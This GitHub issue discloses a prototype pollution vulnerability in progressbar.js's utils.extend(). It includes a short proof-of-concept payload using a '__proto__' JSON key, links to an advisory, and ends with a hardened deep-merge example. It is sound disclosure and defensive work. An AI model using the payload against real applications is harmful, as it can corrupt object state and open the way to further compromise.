Prototype Pollution using extend() in utils.js
lelecolacola123 opened this issue · comments
Hi! There's a prototype pollution vulnerability in the function extend() in the file utils.js. Affected versions of this package are vulnerable to Prototype Pollution, which can allow an attacker to add/modify properties of Object.prototype. The risk is located here:
Line 20 in 74536b9
Line 18 in 74536b9
and the PoC is as follows (the `__proto__` key had its underscores stripped by markdown rendering; restored here):

```javascript
var progressbar = require("progressbar.js");
// JSON.parse creates an own property literally named "__proto__",
// which a naive recursive extend() then writes into Object.prototype.
var BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');
console.log("Before " + {}.test);
progressbar.utils.extend({}, BAD_JSON, {});
console.log("After " + {}.test);
```
More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf
GitHub just published this vulnerability here: GHSA-89qm-hm2x-mxm3
Also being registered by Snyk scan: https://security.snyk.io/vuln/SNYK-JS-PROGRESSBARJS-3184152
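A hardened recursive extend(), added here as an illustration and not the project's own code: the original utils.js implementation is not reproduced, and `safeExtend`, `isPlainObject` and `prototypeIsClean` are assumed names. It shows the two mitigations a maintainer would apply, rejecting prototype-reaching key names and only ever recursing into own plain objects.

```javascript
'use strict';

// Keys that can reach Object.prototype through a deep merge.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Deep-merge every source into target and return target.
// Hypothetical replacement for utils.extend(); not the project's code.
function safeExtend(target, ...sources) {
  for (const source of sources) {
    if (!isPlainObject(source)) continue;
    for (const key of Object.keys(source)) {   // own, enumerable keys only
      if (UNSAFE_KEYS.has(key)) continue;      // drop __proto__ and friends
      const value = source[key];
      if (isPlainObject(value)) {
        // Only recurse into an OWN plain object on target; an inherited
        // one (e.g. target.constructor) would be a route into a prototype.
        const own = Object.prototype.hasOwnProperty.call(target, key);
        const existing = own && isPlainObject(target[key]) ? target[key] : {};
        target[key] = safeExtend(existing, value);
      } else {
        target[key] = value;
      }
    }
  }
  return target;
}

// Regression check for a test suite: nothing leaked onto Object.prototype.
function prototypeIsClean(prop) {
  return !(prop in {});
}

// Constructed input modelled on the issue's PoC, plus an ordinary nested key.
const BAD_JSON = JSON.parse('{"__proto__":{"test":123},"a":{"b":1}}');
const result = safeExtend({}, BAD_JSON, {});
console.log(result.a.b, prototypeIsClean('test')); // 1 true
```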